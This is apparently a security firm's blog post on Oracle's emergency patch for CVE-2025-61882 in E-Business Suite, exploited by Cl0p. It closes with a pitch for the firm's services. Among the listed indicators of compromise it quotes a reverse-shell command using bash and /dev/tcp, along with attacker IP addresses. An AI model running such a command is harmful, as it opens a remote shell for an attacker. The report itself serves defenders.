Oracle has released an emergency security update to address a critical vulnerability in its E-Business Suite (EBS) software after confirming that threat actors associated with the Cl0p ransomware group exploited it in active data theft campaigns.
The flaw, tracked as CVE-2025-61882 with a CVSS score of 9.8, affects the Oracle Concurrent Processing component and allows for unauthenticated remote code execution. Attackers can exploit the vulnerability over HTTP without valid credentials, giving them full control of vulnerable systems.
In its advisory, Oracle stated:
“This vulnerability is remotely exploitable without authentication. If successfully exploited, it may result in remote code execution.”
Oracle’s Chief Security Officer, Rob Duhart, confirmed that the company issued the emergency patch after discovering additional avenues of exploitation during its investigation. The update is intended to prevent continued abuse of unpatched instances that remain exposed to the internet.
Active Exploitation and Indicators of Compromise
Indicators of compromise (IoCs) shared by Oracle point to activity linked to the Scattered LAPSUS$ Hunters group, which appears to be collaborating with Cl0p operators in this campaign. Notable IPs and artifacts include:
- 200.107.207[.]26 and 185.181.60[.]11 – observed in GET and POST request activity
- Reverse shell command:
sh -c /bin/bash -i >& /dev/tcp// 0>&1 - Files associated with proof-of-concept exploit kits, including
oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zipandexp.py
These indicators suggest that the attackers not only leveraged zero-day vulnerabilities but also incorporated previously disclosed flaws from Oracle’s July 2025 Critical Patch Update into chained exploitation workflows.
Cl0p’s Campaign Expands
Mandiant, a Google Cloud subsidiary, reported that Cl0p operators have been conducting large-scale phishing campaigns targeting Oracle EBS customers since mid-August 2025. The campaign used hundreds of compromised accounts to distribute malicious payloads, with the goal of exfiltrating sensitive business and financial data.
Mandiant CTO Charles Carmakal noted that multiple Oracle EBS vulnerabilities were exploited in these incidents. “Cl0p exploited multiple vulnerabilities in Oracle EBS which enabled them to steal large amounts of data from several victims,” he said. “Given the broad zero-day exploitation that has already occurred, organizations should examine whether they were already compromised.”
Impact and Response
The incident underscores the growing sophistication of financially motivated groups such as Cl0p, which have moved beyond traditional ransomware encryption tactics toward data exfiltration and extortion. Their focus on high-value enterprise applications like Oracle EBS reflects a deliberate shift toward exploiting critical business infrastructure.
Oracle recommends immediate application of the new security update and urges organizations to audit network logs for any signs of compromise. Given the confirmed exploitation, applying the patch alone is not sufficient, organizations must also conduct forensic analysis to determine whether data theft or lateral movement has already occurred.
How Netizen Can Help
Netizen assists organizations in identifying, mitigating, and responding to zero-day exploitation through proactive threat intelligence, continuous monitoring, and incident response support. Our managed cybersecurity services include vulnerability scanning, patch verification, and forensic review to detect signs of exploitation in enterprise software like Oracle EBS.
With expertise across both government and commercial environments, Netizen’s 24x7x365 Security Operations Center (SOC) provides real-time visibility and rapid response to active threats. For organizations that suspect exposure to CVE-2025-61882 or similar vulnerabilities, Netizen’s team can help assess compromise indicators, harden systems, and implement long-term security measures to prevent recurrence.
Start the conversation today to secure your enterprise systems before the next critical vulnerability is exploited.
